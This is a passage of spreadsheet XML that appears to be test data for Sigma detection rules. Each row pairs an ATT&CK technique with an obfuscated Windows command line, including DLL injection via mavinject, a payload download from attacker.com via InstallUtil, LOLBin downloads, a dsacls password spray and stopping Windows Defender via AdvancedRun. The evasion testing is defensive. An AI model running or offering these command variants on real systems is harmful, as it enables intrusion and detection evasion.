        <v>0</v>
      </c>
      <c r="I3312" s="43" t="n"/>
      <c r="J3312" s="43" t="n"/>
      <c r="K3312" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3313" ht="15.75" customHeight="1" s="42">
      <c r="A3313" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3313" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3313" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3313" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3313" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\wmic.exe /nOdE:lOcalHoST process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F3313" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3313" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3313" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3313" s="43" t="n"/>
      <c r="J3313" s="43" t="n"/>
      <c r="K3313" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3314" ht="15.75" customHeight="1" s="42">
      <c r="A3314" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3314" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C3314" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D3314" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E3314" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\mavinject.exe 1234 /"INJECTRUNNING" C:\path\to\malicious.dll</t>
        </is>
      </c>
      <c r="F3314" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3314" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3314" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3314" s="43" t="n"/>
      <c r="J3314" s="43" t="n"/>
      <c r="K3314" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3315" ht="15.75" customHeight="1" s="42">
      <c r="A3315" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3315" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C3315" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D3315" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E3315" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\mavinject.exe 1234 -"INJECTRUNNING" C:\path\to\malicious.dll</t>
        </is>
      </c>
      <c r="F3315" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3315" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3315" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3315" s="43" t="n"/>
      <c r="J3315" s="43" t="n"/>
      <c r="K3315" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3316" ht="15.75" customHeight="1" s="42">
      <c r="A3316" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3316" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C3316" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D3316" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E3316" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /"INJECTRUNNING\tC:\temp\evil.dll"</t>
        </is>
      </c>
      <c r="F3316" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3316" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3316" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3316" s="43" t="n"/>
      <c r="J3316" s="43" t="n"/>
      <c r="K3316" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3317" ht="15.75" customHeight="1" s="42">
      <c r="A3317" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3317" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C3317" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D3317" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E3317" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /INjectRUNNInG\Tc:\TemP\Evil.DlL</t>
        </is>
      </c>
      <c r="F3317" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3317" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3317" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3317" s="43" t="n"/>
      <c r="J3317" s="43" t="n"/>
      <c r="K3317" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3318" ht="15.75" customHeight="1" s="42">
      <c r="A3318" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3318" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C3318" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D3318" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E3318" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 -"INJECTRUNNING\tC:\temp\evil.dll"</t>
        </is>
      </c>
      <c r="F3318" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3318" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3318" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3318" s="43" t="n"/>
      <c r="J3318" s="43" t="n"/>
      <c r="K3318" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3319" ht="15.75" customHeight="1" s="42">
      <c r="A3319" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3319" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C3319" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D3319" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E3319" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /iNJECTRUnniNg\tC:\TEmp\evIl.dll</t>
        </is>
      </c>
      <c r="F3319" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3319" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3319" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3319" s="43" t="n"/>
      <c r="J3319" s="43" t="n"/>
      <c r="K3319" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3320" ht="15.75" customHeight="1" s="42">
      <c r="A3320" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3320" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C3320" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D3320" s="43" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E3320" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\Temp\t^mp.bat"</t>
        </is>
      </c>
      <c r="F3320" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3320" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3320" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3320" s="43" t="n"/>
      <c r="J3320" s="43" t="n"/>
      <c r="K3320" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3321" ht="15.75" customHeight="1" s="42">
      <c r="A3321" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3321" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C3321" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D3321" s="43" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E3321" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Windows\Temp &amp;&amp; tmp.bat"</t>
        </is>
      </c>
      <c r="F3321" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3321" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3321" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3321" s="43" t="n"/>
      <c r="J3321" s="43" t="n"/>
      <c r="K3321" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3322" ht="15.75" customHeight="1" s="42">
      <c r="A3322" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3322" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C3322" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D3322" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E3322" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe  /EXEFilename "cmd.exe"  /Run</t>
        </is>
      </c>
      <c r="F3322" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3322" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3322" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3322" s="43" t="n"/>
      <c r="J3322" s="43" t="n"/>
      <c r="K3322" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3323" ht="15.75" customHeight="1" s="42">
      <c r="A3323" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3323" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C3323" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D3323" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E3323" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe -EXEFilename cmd.exe -Run</t>
        </is>
      </c>
      <c r="F3323" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3323" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3323" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3323" s="43" t="n"/>
      <c r="J3323" s="43" t="n"/>
      <c r="K3323" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3324" ht="15.75" customHeight="1" s="42">
      <c r="A3324" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3324" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C3324" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D3324" s="43" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E3324" s="43" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\System32\IME\SHARED\IMEWDBLD.exe" h""ttps://[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml)</t>
        </is>
      </c>
      <c r="F3324" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3324" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3324" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3324" s="43" t="n"/>
      <c r="J3324" s="43" t="n"/>
      <c r="K3324" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3325" ht="15.75" customHeight="1" s="42">
      <c r="A3325" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3325" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C3325" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D3325" s="43" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E3325" s="43" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\System32\IME\SHARED\IMEWDBLD.exe" //[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml)</t>
        </is>
      </c>
      <c r="F3325" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3325" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3325" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3325" s="43" t="n"/>
      <c r="J3325" s="43" t="n"/>
      <c r="K3325" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3326" ht="15.75" customHeight="1" s="42">
      <c r="A3326" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3326" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C3326" s="43" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D3326" s="43" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E3326" s="43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F3326" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3326" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3326" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3326" s="43" t="n"/>
      <c r="J3326" s="43" t="n"/>
      <c r="K3326" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3327" ht="15.75" customHeight="1" s="42">
      <c r="A3327" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3327" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C3327" s="43" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D3327" s="43" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E3327" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "MpCmdRun.exe -Down^loadFile -url [https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt) -path C:\Users	haim\AppData\Local\Temp\Atomic-license.txt"</t>
        </is>
      </c>
      <c r="F3327" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3327" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3327" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3327" s="43" t="n"/>
      <c r="J3327" s="43" t="n"/>
      <c r="K3327" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3328" ht="15.75" customHeight="1" s="42">
      <c r="A3328" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3328" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh</t>
        </is>
      </c>
      <c r="C3328" s="43" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code</t>
        </is>
      </c>
      <c r="D3328" s="43" t="inlineStr">
        <is>
          <t>36475a7d-0f6d-4dce-9b01-6aeb473bbaf1</t>
        </is>
      </c>
      <c r="E3328" s="43" t="inlineStr">
        <is>
          <t>C:\windows\system32\SyncAppvPublishingServer.vbs "
%3bStart-Process calc"</t>
        </is>
      </c>
      <c r="F3328" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3328" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3328" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3328" s="43" t="n"/>
      <c r="J3328" s="43" t="n"/>
      <c r="K3328" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3329" ht="15.75" customHeight="1" s="42">
      <c r="A3329" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3329" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh</t>
        </is>
      </c>
      <c r="C3329" s="43" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code</t>
        </is>
      </c>
      <c r="D3329" s="43" t="inlineStr">
        <is>
          <t>36475a7d-0f6d-4dce-9b01-6aeb473bbaf1</t>
        </is>
      </c>
      <c r="E3329" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c C:\windows\system32\SyncAppvPublishingServer.vbs "
"';'"Start-Process calc"</t>
        </is>
      </c>
      <c r="F3329" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3329" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3329" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3329" s="43" t="n"/>
      <c r="J3329" s="43" t="n"/>
      <c r="K3329" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3330" ht="15.75" customHeight="1" s="42">
      <c r="A3330" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3330" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dsacls_password_spray</t>
        </is>
      </c>
      <c r="C3330" s="43" t="inlineStr">
        <is>
          <t>Potential Password Spraying Attempt Using Dsacls.EXE</t>
        </is>
      </c>
      <c r="D3330" s="43" t="inlineStr">
        <is>
          <t>bac9fb54-2da7-44e9-988f-11e9a5edbc0c</t>
        </is>
      </c>
      <c r="E3330" s="43" t="inlineStr">
        <is>
          <t>set P=/passwd: &amp;&amp; dsacls.exe /user:admin %P%Password123</t>
        </is>
      </c>
      <c r="F3330" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3330" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3330" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3330" s="43" t="n"/>
      <c r="J3330" s="43" t="n"/>
      <c r="K3330" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3331" ht="15.75" customHeight="1" s="42">
      <c r="A3331" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3331" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_installutil_download</t>
        </is>
      </c>
      <c r="C3331" s="43" t="inlineStr">
        <is>
          <t>File Download Via InstallUtil.EXE</t>
        </is>
      </c>
      <c r="D3331" s="43" t="inlineStr">
        <is>
          <t>75edd216-1939-4c73-8d61-7f3a0d85b5cc</t>
        </is>
      </c>
      <c r="E3331" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "InstallUtil.exe /logfile= /LogToConsole=false /U h^t^tp://[attacker.com/payload.dll](https://www.google.com/search?q=https://attacker.com/payload.dll)"</t>
        </is>
      </c>
      <c r="F3331" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3331" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3331" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3331" s="43" t="n"/>
      <c r="J3331" s="43" t="n"/>
      <c r="K3331" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3332" ht="15.75" customHeight="1" s="42">
      <c r="A3332" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3332" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mofcomp_execution</t>
        </is>
      </c>
      <c r="C3332" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Mofcomp Execution</t>
        </is>
      </c>
      <c r="D3332" s="43" t="inlineStr">
        <is>
          <t>1dd05363-104e-4b4a-b963-196a534b03a1</t>
        </is>
      </c>
      <c r="E3332" s="43" t="inlineStr">
        <is>
          <t>"C:\windows\system32\wbem\mofcomp.exe" C:\Users\Public\..\Public\T1546.003.mof</t>
        </is>
      </c>
      <c r="F3332" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3332" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3332" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3332" s="43" t="n"/>
      <c r="J3332" s="43" t="n"/>
      <c r="K3332" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3333" ht="15.75" customHeight="1" s="42">
      <c r="A3333" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3333" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mofcomp_execution</t>
        </is>
      </c>
      <c r="C3333" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Mofcomp Execution</t>
        </is>
      </c>
      <c r="D3333" s="43" t="inlineStr">
        <is>
          <t>1dd05363-104e-4b4a-b963-196a534b03a1</t>
        </is>
      </c>
      <c r="E3333" s="43" t="inlineStr">
        <is>
          <t>"C:\windows\system32\wbem\mofcomp.exe" "C:\Users\Public"\T1546.003.mof</t>
        </is>
      </c>
      <c r="F3333" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3333" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3333" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3333" s="43" t="n"/>
      <c r="J3333" s="43" t="n"/>
      <c r="K3333" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3334" ht="15.75" customHeight="1" s="42">
      <c r="A3334" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3334" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remotefxvgpudisablement_abuse</t>
        </is>
      </c>
      <c r="C3334" s="43" t="inlineStr">
        <is>
          <t>RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses</t>
        </is>
      </c>
      <c r="D3334" s="43" t="inlineStr">
        <is>
          <t>a6fc3c46-23b8-4996-9ea2-573f4c4d88c5</t>
        </is>
      </c>
      <c r="E3334" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {&amp; 'Invoke-ATHRemoteFXvGPUDisablementCommand' -ModuleName foo -ModulePath $PWD}</t>
        </is>
      </c>
      <c r="F3334" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3334" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3334" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3334" s="43" t="n"/>
      <c r="J3334" s="43" t="n"/>
      <c r="K3334" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3335" ht="15.75" customHeight="1" s="42">
      <c r="A3335" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3335" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remotefxvgpudisablement_abuse</t>
        </is>
      </c>
      <c r="C3335" s="43" t="inlineStr">
        <is>
          <t>RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses</t>
        </is>
      </c>
      <c r="D3335" s="43" t="inlineStr">
        <is>
          <t>a6fc3c46-23b8-4996-9ea2-573f4c4d88c5</t>
        </is>
      </c>
      <c r="E3335" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Invoke-Expression ('Invoke-ATHRemoteFXv' + 'GPUDisablementCommand -ModuleName foo -ModulePath $PWD')}</t>
        </is>
      </c>
      <c r="F3335" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3335" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3335" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3335" s="43" t="n"/>
      <c r="J3335" s="43" t="n"/>
      <c r="K3335" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3336" ht="15.75" customHeight="1" s="42">
      <c r="A3336" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3336" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_proxy_execution</t>
        </is>
      </c>
      <c r="C3336" s="43" t="inlineStr">
        <is>
          <t>Program Executed Using Proxy/Local Command Via SSH.EXE</t>
        </is>
      </c>
      <c r="D3336" s="43" t="inlineStr">
        <is>
          <t>7d6d30b8-5b91-4b90-a891-46cccaf29598</t>
        </is>
      </c>
      <c r="E3336" s="43" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\System32\OpenSSH\ssh.exe" -o "PermitLocalCommand yes" -o "LocalCommand calc.exe" adversary-host</t>
        </is>
      </c>
      <c r="F3336" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3336" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3336" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3336" s="43" t="n"/>
      <c r="J3336" s="43" t="n"/>
      <c r="K3336" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3337" ht="15.75" customHeight="1" s="42">
      <c r="A3337" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3337" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_proxy_execution</t>
        </is>
      </c>
      <c r="C3337" s="43" t="inlineStr">
        <is>
          <t>Program Executed Using Proxy/Local Command Via SSH.EXE</t>
        </is>
      </c>
      <c r="D3337" s="43" t="inlineStr">
        <is>
          <t>7d6d30b8-5b91-4b90-a891-46cccaf29598</t>
        </is>
      </c>
      <c r="E3337" s="43" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\System32\OpenSSH\ssh.exe" -o Proxy""Command="calc.exe" adversary-host</t>
        </is>
      </c>
      <c r="F3337" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3337" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3337" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3337" s="43" t="n"/>
      <c r="J3337" s="43" t="n"/>
      <c r="K3337" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3338" ht="15.75" customHeight="1" s="42">
      <c r="A3338" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B3338" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_regsvcs_uncommon_extension_execution</t>
        </is>
      </c>
      <c r="C3338" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension</t>
        </is>
      </c>
      <c r="D3338" s="43" t="inlineStr">
        <is>
          <t>e9f8f8cc-07cc-4e81-b724-f387db9175e4</t>
        </is>
      </c>
      <c r="E3338" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "Regasm.exe /U C:\temp\payload.t^xt"</t>
        </is>
      </c>
      <c r="F3338" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3338" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3338" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3338" s="43" t="n"/>
      <c r="J3338" s="43" t="n"/>
      <c r="K3338" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3339" ht="15.75" customHeight="1" s="42">
      <c r="A3339" s="43" t="inlineStr">
        <is>
          <t>t1134.002</t>
        </is>
      </c>
      <c r="B3339" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun_priv_user</t>
        </is>
      </c>
      <c r="C3339" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Suspicious Execution</t>
        </is>
      </c>
      <c r="D3339" s="43" t="inlineStr">
        <is>
          <t>fa00b701-44c6-4679-994d-5a18afa8a707</t>
        </is>
      </c>
      <c r="E3339" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe  /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs  8 /Run</t>
        </is>
      </c>
      <c r="F3339" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3339" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3339" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3339" s="43" t="n"/>
      <c r="J3339" s="43" t="n"/>
      <c r="K3339" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3340" ht="15.75" customHeight="1" s="42">
